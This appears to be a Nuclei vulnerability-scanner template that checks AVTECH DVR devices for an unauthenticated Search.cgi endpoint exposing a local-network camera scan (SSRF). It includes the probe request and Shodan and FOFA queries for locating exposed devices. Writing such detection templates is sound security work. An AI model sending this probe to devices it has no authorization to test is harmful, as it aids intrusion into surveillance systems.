nuclei-templates/http/vulnerabilities/avtech/avtech-dvr-ssrf.yaml

39 lines
891 B
YAML

id: avtech-dvr-ssrf
info:
name: AVTECH DVR - SSRF
author: ritikchaddha
severity: medium
description: |
AVTECH DVR device, Search.cgi can be accessed directly. Search.cgi is responsible for searching and accessing cameras in the local network. Search.cgi provides the cgi_query function.
metadata:
max-request: 1
verified: true
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: ssrf,avtech,unauth,iot
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/nobody/Search.cgi?action=scan"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Search.Device'
- 'Proto='
- 'IPAddress='
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200